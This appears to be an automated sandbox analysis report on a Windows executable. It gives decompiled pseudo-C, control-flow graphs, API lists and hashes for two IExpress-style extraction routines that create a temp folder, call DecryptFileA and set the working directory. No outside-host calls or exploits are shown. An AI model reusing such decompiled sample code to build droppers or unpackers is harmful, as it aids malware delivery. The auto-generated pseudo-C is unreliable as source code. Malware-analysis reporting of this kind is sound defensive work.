                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 450 8d2f1d-8d2f3d 451 8d2f6c-8d2f73 call 8d5164 450->451 452 8d2f3f-8d2f46 450->452 460 8d2f79-8d2f80 call 8d55a0 451->460 461 8d3041 451->461 454 8d2f5f-8d2f66 call 8d3a3f 452->454 455 8d2f48 call 8d51e5 452->455 454->451 454->461 462 8d2f4d-8d2f4f 455->462 460->461 468 8d2f86-8d2fbe GetSystemDirectoryA call 8d658a LoadLibraryA 460->468 464 8d3043-8d3053 call 8d6ce0 461->464 462->461 465 8d2f55-8d2f5d 462->465 465->451 465->454 472 8d2ff7-8d3004 FreeLibrary 468->472 473 8d2fc0-8d2fd4 GetProcAddress 468->473 474 8d3017-8d3024 SetCurrentDirectoryA 472->474 475 8d3006-8d300c 472->475 473->472 476 8d2fd6-8d2fee DecryptFileA 473->476 478 8d3054-8d305a 474->478 479 8d3026-8d303c call 8d44b9 call 8d6285 474->479 475->474 477 8d300e call 8d621e 475->477 476->472 490 8d2ff0-8d2ff5 476->490 486 8d3013-8d3015 477->486 483 8d305c call 8d3b26 478->483 484 8d3065-8d306c 478->484 479->461 491 8d3061-8d3063 483->491 487 8d307c-8d3089 484->487 488 8d306e-8d3075 call 8d256d 484->488 486->461 486->474 493 8d308b-8d3091 487->493 494 8d30a1-8d30a9 487->494 496 8d307a 488->496 490->472 491->461 491->484 493->494 497 8d3093 call 8d3ba2 493->497 499 8d30ab-8d30ad 494->499 500 8d30b4-8d30b7 494->500 496->487 503 8d3098-8d309a 497->503 499->500 502 8d30af call 8d4169 499->502 500->464 502->500 503->461 505 8d309c 503->505 505->494
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E008D2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0x8d8a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E008D5164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E008D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E008D55A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E008D658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0x8da288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0x8d8a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0x8d8a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0x8d8d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0x8d8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0x8d9a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E008D256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0x8d8a24; // 0x0
                                                                                                                                                                                                                                            									 *0x8d9a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0x8d8a38;
                                                                                                                                                                                                                                            										if( *0x8d8a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E008D4169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0x8d9a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E008D3BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0x8d8a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E008D3B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E008D44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0x8d9a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E008D621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0x8d8a24;
                                                                                                                                                                                                                                            				if( *0x8d8a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E008D3A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E008D51E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0x8d8a38;
                                                                                                                                                                                                                                            				if( *0x8d8a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x008d2f1d
                                                                                                                                                                                                                                            0x008d2f28
                                                                                                                                                                                                                                            0x008d2f2f
                                                                                                                                                                                                                                            0x008d2f3d
                                                                                                                                                                                                                                            0x008d2f6c
                                                                                                                                                                                                                                            0x008d2f6c
                                                                                                                                                                                                                                            0x008d2f71
                                                                                                                                                                                                                                            0x008d2f73
                                                                                                                                                                                                                                            0x008d3041
                                                                                                                                                                                                                                            0x008d3041
                                                                                                                                                                                                                                            0x008d3043
                                                                                                                                                                                                                                            0x008d3053
                                                                                                                                                                                                                                            0x008d3053
                                                                                                                                                                                                                                            0x008d2f79
                                                                                                                                                                                                                                            0x008d2f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2f86
                                                                                                                                                                                                                                            0x008d2f86
                                                                                                                                                                                                                                            0x008d2f93
                                                                                                                                                                                                                                            0x008d2f9e
                                                                                                                                                                                                                                            0x008d2fa0
                                                                                                                                                                                                                                            0x008d2fa6
                                                                                                                                                                                                                                            0x008d2fb8
                                                                                                                                                                                                                                            0x008d2fba
                                                                                                                                                                                                                                            0x008d2fbe
                                                                                                                                                                                                                                            0x008d2fc6
                                                                                                                                                                                                                                            0x008d2fcc
                                                                                                                                                                                                                                            0x008d2fd4
                                                                                                                                                                                                                                            0x008d2fd6
                                                                                                                                                                                                                                            0x008d2fd8
                                                                                                                                                                                                                                            0x008d2fe0
                                                                                                                                                                                                                                            0x008d2fe6
                                                                                                                                                                                                                                            0x008d2fee
                                                                                                                                                                                                                                            0x008d2ff0
                                                                                                                                                                                                                                            0x008d2ff5
                                                                                                                                                                                                                                            0x008d2ff5
                                                                                                                                                                                                                                            0x008d2fee
                                                                                                                                                                                                                                            0x008d2fd4
                                                                                                                                                                                                                                            0x008d2ff8
                                                                                                                                                                                                                                            0x008d2ffe
                                                                                                                                                                                                                                            0x008d3004
                                                                                                                                                                                                                                            0x008d3017
                                                                                                                                                                                                                                            0x008d301c
                                                                                                                                                                                                                                            0x008d3024
                                                                                                                                                                                                                                            0x008d3054
                                                                                                                                                                                                                                            0x008d305a
                                                                                                                                                                                                                                            0x008d3065
                                                                                                                                                                                                                                            0x008d3065
                                                                                                                                                                                                                                            0x008d306c
                                                                                                                                                                                                                                            0x008d306e
                                                                                                                                                                                                                                            0x008d3075
                                                                                                                                                                                                                                            0x008d307a
                                                                                                                                                                                                                                            0x008d307a
                                                                                                                                                                                                                                            0x008d307c
                                                                                                                                                                                                                                            0x008d3081
                                                                                                                                                                                                                                            0x008d3087
                                                                                                                                                                                                                                            0x008d3089
                                                                                                                                                                                                                                            0x008d30a1
                                                                                                                                                                                                                                            0x008d30a1
                                                                                                                                                                                                                                            0x008d30a9
                                                                                                                                                                                                                                            0x008d30ab
                                                                                                                                                                                                                                            0x008d30ad
                                                                                                                                                                                                                                            0x008d30af
                                                                                                                                                                                                                                            0x008d30af
                                                                                                                                                                                                                                            0x008d30ad
                                                                                                                                                                                                                                            0x008d30b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d308b
                                                                                                                                                                                                                                            0x008d308b
                                                                                                                                                                                                                                            0x008d3091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3093
                                                                                                                                                                                                                                            0x008d3098
                                                                                                                                                                                                                                            0x008d309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d309c
                                                                                                                                                                                                                                            0x008d3089
                                                                                                                                                                                                                                            0x008d305c
                                                                                                                                                                                                                                            0x008d3061
                                                                                                                                                                                                                                            0x008d3063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3063
                                                                                                                                                                                                                                            0x008d302b
                                                                                                                                                                                                                                            0x008d3032
                                                                                                                                                                                                                                            0x008d303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d303c
                                                                                                                                                                                                                                            0x008d3006
                                                                                                                                                                                                                                            0x008d300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d300e
                                                                                                                                                                                                                                            0x008d3015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d3015
                                                                                                                                                                                                                                            0x008d2f80
                                                                                                                                                                                                                                            0x008d2f3f
                                                                                                                                                                                                                                            0x008d2f46
                                                                                                                                                                                                                                            0x008d2f5f
                                                                                                                                                                                                                                            0x008d2f5f
                                                                                                                                                                                                                                            0x008d2f64
                                                                                                                                                                                                                                            0x008d2f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2f66
                                                                                                                                                                                                                                            0x008d2f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d2f55
                                                                                                                                                                                                                                            0x008d2f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 008D2F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 008D2FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 008D2FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 008D2FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008D2FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008D301C
                                                                                                                                                                                                                                              • Part of subcall function 008D51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,008D2F4D,?,00000002,00000000), ref: 008D5201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_file.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-1173327654
                                                                                                                                                                                                                                            • Opcode ID: 31d0655f5eb9cb13aed371efe0743e0514ac15230e8ee6012ac08e8bbb0a05d7
                                                                                                                                                                                                                                            • Instruction ID: c9e5d72aca0dbea867e5b48159064b9c4a649295cee2e28cea3337c118b37f11
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31d0655f5eb9cb13aed371efe0743e0514ac15230e8ee6012ac08e8bbb0a05d7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5241C631A01A25DBDB34AB7AAC45B6A33B8FB54750F100767E941C2391EF74CE80CA63
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 522 8d5467-8d5484 523 8d551c-8d5528 call 8d1680 522->523 524 8d548a-8d5490 call 8d53a1 522->524 528 8d552d-8d5539 call 8d58c8 523->528 527 8d5495-8d5497 524->527 529 8d549d-8d54c0 call 8d1781 527->529 530 8d5581-8d5583 527->530 537 8d554d-8d5552 528->537 538 8d553b-8d5545 CreateDirectoryA 528->538 539 8d550c-8d551a call 8d658a 529->539 540 8d54c2-8d54d8 GetSystemInfo 529->540 533 8d558d-8d559d call 8d6ce0 530->533 544 8d5585-8d558b 537->544 545 8d5554-8d5557 call 8d597d 537->545 542 8d5577-8d557c call 8d6285 538->542 543 8d5547 538->543 539->528 548 8d54fe 540->548 549 8d54da-8d54dd 540->549 542->530 543->537 544->533 555 8d555c-8d555e 545->555 556 8d5503-8d5507 call 8d658a 548->556 553 8d54df-8d54e2 549->553 554 8d54f7-8d54fc 549->554 557 8d54e4-8d54e7 553->557 558 8d54f0-8d54f5 553->558 554->556 555->544 559 8d5560-8d5566 555->559 556->539 557->539 561 8d54e9-8d54ee 557->561 558->556 559->530 562 8d5568-8d5575 RemoveDirectoryA 559->562 561->556 562->530
                                                                                                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                                                                                                            			E008D5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t10;
                                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				intOrPtr _t61;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t10 =  *0x8d8004; // 0x12cb0cef
                                                                                                                                                                                                                                            				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                                            					_t48 = 0x8d91e4;
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E008D1680(0x8d91e4, 0x104);
                                                                                                                                                                                                                                            					L14:
                                                                                                                                                                                                                                            					_t13 = E008D58C8(_t48); // executed
                                                                                                                                                                                                                                            					if(_t13 != 0) {
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						_t42 = _a4;
                                                                                                                                                                                                                                            						if(_a4 == 0) {
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							 *0x8d9124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            							L24:
                                                                                                                                                                                                                                            							return E008D6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t16 = E008D597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                            						if(_t16 != 0) {
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t61 =  *0x8d8a20; // 0x0
                                                                                                                                                                                                                                            						if(_t61 != 0) {
                                                                                                                                                                                                                                            							 *0x8d8a20 = 0;
                                                                                                                                                                                                                                            							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L22:
                                                                                                                                                                                                                                            						_t14 = 0;
                                                                                                                                                                                                                                            						goto L24;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                            						 *0x8d9124 = E008D6285();
                                                                                                                                                                                                                                            						goto L22;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x8d8a20 = 1;
                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 =  &_v268;
                                                                                                                                                                                                                                            				_t20 = E008D53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                            				if(_t20 == 0) {
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t48 = 0x8d91e4;
                                                                                                                                                                                                                                            				E008D1781(0x8d91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                            				if(( *0x8d9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_t42 = 0x104;
                                                                                                                                                                                                                                            					E008D658A(_t48, 0x104, 0x8d1140);
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                            				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					_push("i386");
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					E008D658A(_t48, 0x104);
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = _t26 - 1;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					_push("mips");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = _t28 - 1;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					_push("alpha");
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t29 != 1) {
                                                                                                                                                                                                                                            					goto L12;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push("ppc");
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            0x008d5472
                                                                                                                                                                                                                                            0x008d5479
                                                                                                                                                                                                                                            0x008d5481
                                                                                                                                                                                                                                            0x008d5484
                                                                                                                                                                                                                                            0x008d551c
                                                                                                                                                                                                                                            0x008d5521
                                                                                                                                                                                                                                            0x008d5528
                                                                                                                                                                                                                                            0x008d552d
                                                                                                                                                                                                                                            0x008d552f
                                                                                                                                                                                                                                            0x008d5539
                                                                                                                                                                                                                                            0x008d554d
                                                                                                                                                                                                                                            0x008d554d
                                                                                                                                                                                                                                            0x008d5552
                                                                                                                                                                                                                                            0x008d5585
                                                                                                                                                                                                                                            0x008d5585
                                                                                                                                                                                                                                            0x008d558b
                                                                                                                                                                                                                                            0x008d558d
                                                                                                                                                                                                                                            0x008d559d
                                                                                                                                                                                                                                            0x008d559d
                                                                                                                                                                                                                                            0x008d5557
                                                                                                                                                                                                                                            0x008d555e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5560
                                                                                                                                                                                                                                            0x008d5566
                                                                                                                                                                                                                                            0x008d5569
                                                                                                                                                                                                                                            0x008d556f
                                                                                                                                                                                                                                            0x008d556f
                                                                                                                                                                                                                                            0x008d5581
                                                                                                                                                                                                                                            0x008d5581
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5581
                                                                                                                                                                                                                                            0x008d5545
                                                                                                                                                                                                                                            0x008d557c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d557c
                                                                                                                                                                                                                                            0x008d5547
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5547
                                                                                                                                                                                                                                            0x008d548a
                                                                                                                                                                                                                                            0x008d5490
                                                                                                                                                                                                                                            0x008d5497
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d549d
                                                                                                                                                                                                                                            0x008d54ab
                                                                                                                                                                                                                                            0x008d54b4
                                                                                                                                                                                                                                            0x008d54c0
                                                                                                                                                                                                                                            0x008d550c
                                                                                                                                                                                                                                            0x008d5511
                                                                                                                                                                                                                                            0x008d5515
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5515
                                                                                                                                                                                                                                            0x008d54c9
                                                                                                                                                                                                                                            0x008d54d6
                                                                                                                                                                                                                                            0x008d54d8
                                                                                                                                                                                                                                            0x008d54fe
                                                                                                                                                                                                                                            0x008d5503
                                                                                                                                                                                                                                            0x008d5507
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d5507
                                                                                                                                                                                                                                            0x008d54da
                                                                                                                                                                                                                                            0x008d54dd
                                                                                                                                                                                                                                            0x008d54f7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d54f7
                                                                                                                                                                                                                                            0x008d54df
                                                                                                                                                                                                                                            0x008d54e2
                                                                                                                                                                                                                                            0x008d54f0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d54f0
                                                                                                                                                                                                                                            0x008d54e7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x008d54e9
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D54C9
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D553D
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D556F
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D53FB
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D5402
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D541F
                                                                                                                                                                                                                                              • Part of subcall function 008D53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 008D542B
